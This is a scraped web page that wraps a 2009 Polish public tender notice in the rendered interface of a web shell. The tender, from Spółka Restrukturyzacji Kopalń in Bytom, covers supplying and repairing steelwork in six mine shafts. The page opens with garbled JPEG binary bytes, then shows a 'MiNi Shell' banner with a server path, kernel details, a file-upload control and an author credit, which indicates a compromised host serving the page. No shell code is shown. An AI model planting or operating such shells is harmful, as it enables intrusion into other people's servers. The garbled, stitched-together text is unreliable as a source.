JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090427/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090427/122824-N-2009.html

<p class="kh_header"><b>Bytom: Część I:Dostawa i wymiana zbrojenia  w szybie Siemianowice III. 
Część II:Dostawa i wymiana zbrojenia w szybie Bańgów 
Część III: Dostawa i wymiana zbrojenia w szybie Kolejowy I 
Część IV: Remont zbrojenia szybowego w szybie Witold I 
Część V:  Remont zbrojenia szybowego w szybie Gigant.
Część VI: Remont zbrojenia szybowego w szybie Jan III- etap IV</b><br>
<b>Numer ogłoszenia: 122824 - 2009; data zamieszczenia: 27.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Spółka Restrukturyzacji Kopalń S.A. , ul. Strzelców Bytomskich 207, 41-914 Bytom, woj. śląskie, tel. 032 3513300, 3513301, 3513364, faks 032 3513309, -10, 3513369.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.srk.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednoosobowa Spółka Skarbu Państwa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Część I:Dostawa i wymiana zbrojenia  w szybie Siemianowice III. 
Część II:Dostawa i wymiana zbrojenia w szybie Bańgów 
Część III: Dostawa i wymiana zbrojenia w szybie Kolejowy I 
Część IV: Remont zbrojenia szybowego w szybie Witold I 
Część V:  Remont zbrojenia szybowego w szybie Gigant.
Część VI: Remont zbrojenia szybowego w szybie Jan III- etap IV.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I:Dostawa i wymiana zbrojenia  w szybie Siemianowice III. 
Część II:Dostawa i wymiana zbrojenia w szybie Bańgów 
Część III: Dostawa i wymiana zbrojenia w szybie Kolejowy I 
Część IV: Remont zbrojenia szybowego w szybie Witold I 
Część V:  Remont zbrojenia szybowego w szybie Gigant.
Część VI: Remont zbrojenia szybowego w szybie Jan III- etap IV.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.25.41.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Oferta powinna być zabezpieczona wadium w wysokości: 18 500,00 zł (słownie: osiemnaście tysięcy pięćset  złotych 00/100) w tym:
Część I - 3.900,00 zł (trzy tysiące dziewięćset złotych 00/100)
Część II - 2.100,00 zł (dwa tysiące sto złotych 00/100)
Część III - 4.800,00 zł (cztery tysiące osiemset złotych 00/100)
Część IV - 2.400,00 zł (dwa tysiące czterysta złotych 00/100)
Część V - 2.900,00 zł (dwa tysiące dziewięćset złotych 00/100)
Część VI - 2.400,00 zł (dwa tysiące czterysta złotych 00/100)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Wypełnić druk OFERTA - załącznik nr 1. Ofertę i załączniki należy sporządzić ściśle wg wzorów druków załączonych przez Zamawiającego.
2. Wszystkie przyszłe zobowiązania Wykonawcy związane z realizacją umowy w sprawie zamówienia publicznego, ogólne warunki umowy zawiera projekt umowy - załącznik nr 2 do druku OFERTA.
3. Oświadczenie Wykonawcy, zgodnie z art. 44 Pzp, stanowiące załącznik nr 3 do druku OFERTA. W przypadku udostępnienia Wykonawcy potencjału technicznego i osób zdolnych do wykonania zamówienia przez inne podmioty Wykonawca przedstawi pisemne zobowiązanie tych podmiotów do ich udostępnienia, które należy dołączyć do Załącznika nr 3 do druku OFERTA.
4. Aktualny odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 (sześć) miesięcy przed upływem terminu składania ofert.
5. Koncesje, zezwolenia lub licencje, jeżeli ustawy nakładają obowiązek posiadania koncesji, zezwolenia lub licencji na podjęcie działalności gospodarczej w zakresie objętym zamówieniem.
6. Wykaz personelu/podwykonawców przewidzianych do realizacji zamówienia wraz   z wykazem uprawnień zgodnie z punktem 4.3 SIWZ - załącznik Nr 4 do druku OFERTA. Zamawiający zobowiązuje Wykonawcę do wskazania w ofercie tej części zamówienia, której wykonanie zamierza powierzyć podwykonawcy. W przypadku udziału podwykonawcy należy dołączyć Załącznik nr 4a do druku OFERTA.
7. Wykaz ważniejszych prac wykonanych w okresie ostatnich 3/trzech lat usług, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres, z podaniem ich wartości, przedmiotu, dat wykonania, odbiorców zgodnie z punktem 4.4 SIWZ oraz załączenia dokumentów potwierdzających, że usługi te zostały wykonane należycie - załącznik Nr 5 do druku OFERTA.
8. Uprawnienia do wykonywania remontów urządzeń, (modernizacji) w klasie I, określonej normą PN-B-06200 z grudnia 2002 roku - załączniki A, B, C, D,  wdrożony i certyfikowany przez jednostkę notyfikowaną system zarządzania jakością w przedmiocie zamówienia, wdrożony i certyfikowany system zapewnienia jakości w procesach spawania dla zakresu ujętego w przedmiocie zamówienia, na zgodność z wymaganiami obowiązującej normy. Potwierdzenie spełnienia w/w uprawnień oraz uwarunkowań należy dołączyć do oferty zgodnie z punktem 4.2 SIWZ.
9. Polisa lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności zgodnie z punktem 4.6 SIWZ.
10. Warunki gwarancji i serwisu gwarancyjnego - załącznik Nr 6 do druku OFERTA.
11. Wypełniony formularz cenowy zawierający cenę za wykonanie zamówienia wraz 
z cennikiem  zawierającym kwoty jednostkowe (netto i brutto) dla poszczególnych prac przy ich realizacji dla danej Części zamówienia  - załącznik nr 7 do druku OFERTA..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Wypełnić druk OFERTA - załącznik nr 1. Ofertę i załączniki należy sporządzić ściśle wg wzorów druków załączonych przez Zamawiającego.
2. Wszystkie przyszłe zobowiązania Wykonawcy związane z realizacją umowy w sprawie zamówienia publicznego, ogólne warunki umowy zawiera projekt umowy - załącznik nr 2 do druku OFERTA.
3. Oświadczenie Wykonawcy, zgodnie z art. 44 Pzp, stanowiące załącznik nr 3 do druku OFERTA. W przypadku udostępnienia Wykonawcy potencjału technicznego i osób zdolnych do wykonania zamówienia przez inne podmioty Wykonawca przedstawi pisemne zobowiązanie tych podmiotów do ich udostępnienia, które należy dołączyć do Załącznika nr 3 do druku OFERTA.
4. Aktualny odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 (sześć) miesięcy przed upływem terminu składania ofert.
5. Koncesje, zezwolenia lub licencje, jeżeli ustawy nakładają obowiązek posiadania koncesji, zezwolenia lub licencji na podjęcie działalności gospodarczej w zakresie objętym zamówieniem.
6. Wykaz personelu/podwykonawców przewidzianych do realizacji zamówienia wraz    z wykazem uprawnień zgodnie z punktem 4.3 SIWZ - załącznik Nr 4 do druku OFERTA. Zamawiający zobowiązuje Wykonawcę do wskazania w ofercie tej części zamówienia, której wykonanie zamierza powierzyć podwykonawcy. W przypadku udziału podwykonawcy należy dołączyć Załącznik nr 4a do druku OFERTA.
7. Wykaz ważniejszych prac wykonanych w okresie ostatnich 3/trzech lat usług, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres, z podaniem ich wartości, przedmiotu, dat wykonania, odbiorców zgodnie z punktem 4.4 SIWZ oraz załączenia dokumentów potwierdzających, że usługi te zostały wykonane należycie - załącznik Nr 5 do druku OFERTA.
8. Uprawnienia do wykonywania remontów urządzeń, (modernizacji) w klasie I, określonej normą PN-B-06200 z grudnia 2002 roku - załączniki A, B, C, D,  wdrożony i certyfikowany przez jednostkę notyfikowaną system zarządzania jakością w przedmiocie zamówienia, wdrożony i certyfikowany system zapewnienia jakości w procesach spawania dla zakresu ujętego w przedmiocie zamówienia, na zgodność z wymaganiami obowiązującej normy. Potwierdzenie spełnienia w/w uprawnień oraz uwarunkowań należy dołączyć do oferty zgodnie z punktem 4.2 SIWZ.
9. Polisa lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności zgodnie z punktem 4.6 SIWZ.
10. Warunki gwarancji i serwisu gwarancyjnego - załącznik Nr 6 do druku OFERTA.
11. Wypełniony formularz cenowy zawierający cenę za wykonanie zamówienia wraz 
z cennikiem zawierającym kwoty jednostkowe (netto i brutto) dla poszczególnych prac przy ich realizacji dla danej Części zamówienia - załącznik nr 7 do druku OFERTA..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.srk.com.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Spółka Restrukturyzacji Kopalń S.A. 41-914 Bytom, ul Strzelców Bytomskich 207.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.05.2009 godzina 09:00, miejsce: Spółka Restrukturyzacji Kopalń S.A. 41-914 Bytom, ul Strzelców Bytomskich 207 - sekretariat Spółki.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I: Dostawa i wymiana zbrojenia  w szybie Siemianowice III..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa i wymiana zbrojenia w szybie Siemianowice III 
Lokalizacja: Siemianowice, ul. Olimpijska 30.
Zakres rzeczowy robót do wykonania w szybie Siemianowice III:
dostawa i wymiana 18 sztuk dźwigarów głównych zbrojenia szybowego wykonanego  z [ 240x4200, dostawa i wymiana 4 sztuk dźwigarów podporowych dźwigarów głównych zbrojenia wykonanych z [ 240x4900.
Dane dotyczące szybu oraz górniczego wyciągu szybowego szybu Siemianowice III wraz z warunkami prowadzenia ruchu przedstawiono w zał. nr 8 do SIWZ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.25.41.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II:Dostawa i wymiana zbrojenia w szybie Bańgów..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II: Dostawa i wymiana zbrojenia w szybie Bańgów.
Lokalizacja: Siemianowice ul. Krupanka.

Zakres rzeczowy robót do wykonania w szybie Bańgów: dostosowanie konstrukcji stacji zwrotnej liny wyrównawczej do zgodności z obowiązującymi przepisami (pkt. 5.15.12.2. załącznika nr 4 do rozporządzenia Ministra Gospodarki z dnia 28 czerwca 2002 roku).
Dane dotyczące szybu oraz górniczego wyciągu szybowego szybu Bańgów wraz 
z warunkami prowadzenia ruchu przedstawiono w zał. nr 8 do SIWZ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.25.41.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III:    Dostawa i wymiana zbrojenia w szybie Kolejowy I..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część III: Dostawa i wymiana zbrojenia w  szybie Kolejowy I.
Lokalizacja: Chorzów, ul. Wiejska 5

Zakres rzeczowy robót do wykonania w szybie Kolejowy I: dostawa i wymiana 4 sztuk dźwigarów głównych zbrojenia szybowego wykonanego 
z [ 300x3150, dostawa i wymiana 2 sztuk dźwigarów głównych zbrojenia szybowego wykonanego z [ 200x3150, dostawa  i  wymiana 8 sztuk dźwigarów podporowych dźwigarów głównych wykonanych z [ 200 (7x3750+1x4250),
dostawa i wymiana 19 sztuk prowadników stalowych skrzynkowych o przekroju 200x150x6000.
Dane dotyczące szybu oraz górniczego wyciągu szybowego szybu Kolejowy I wraz 
z warunkami prowadzenia ruchu przedstawiono w zał. nr 8 do SIWZ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.25.41.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część IV:Remont zbrojenia szybowego w szybie Witold I..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część IV: Remont zbrojenia szybowego w szybie Witold I
Lokalizacja: Jaworzno ul. Grunwaldzka 275.

Zakres rzeczowy robót do wykonania w szybie Witold I: dostawa i wymiana 3 sztuk prowadników drewnianych 180x200x6000, prostowanie 1-go ciągu prowadniczego (około 270 m).

Dane dotyczące szybu oraz górniczego wyciągu szybowego szybu Witold I wraz 
z warunkami prowadzenia ruchu przedstawiono w zał. nr 8 do SIWZ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.25.41.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Część V: Remont zbrojenia szybowego w  szybie Gigant..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część V: Remont zbrojenia szybowego w  szybie Gigant.
 Lokalizacja: Zabrze, ul. Szybowa 2.

Zakres rzeczowy robót do wykonania w szybie Gigant: dostawa i wymiana 5 dźwigarów głównych (dwudzielnych) wykonanych z dwuteownika NP 340x 7520 wraz z dźwigarami rozporowymi wykonanymi z dwuteownika NP 240 oraz wspornikami do mocowania prowadników drewnianych i stalowych (konsoli) wraz ze śrubami mocującymi i podkładkami. 

Dane dotyczące szybu oraz górniczego wyciągu szybowego szybu Gigant wraz 
z warunkami prowadzenia ruchu przedstawiono w zał. nr 8 do SIWZ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.25.41.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Część VI: Remont zbrojenia szybowego w szybie Jan III - etap IV.
Lokalizacja: Czerwionka-Leszczyny, ul 3-go Maja 44..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część VI: Remont zbrojenia szybowego w szybie Jan III - etap IV
Lokalizacja: Czerwionka-Leszczyny, ul 3-go Maja 44.

Zakres rzeczowy robót do wykonania w szybie Jan III: dostawa i wymiana 6 sztuk prowadników stalowych skrzynkowych o profilu [ ] 150x200x8000 oraz 12 sztuk dźwigarów głównych o przekroju 162x100x1750, wykonanych z 2-ch kątowników 150x100x12, zespawanych w skrzynkę.
Dane dotyczące szybu oraz górniczego wyciągu szybowego szybu Jan III wraz z warunkami prowadzenia ruchu przedstawiono w zał. nr 8 do SIWZ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.25.41.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com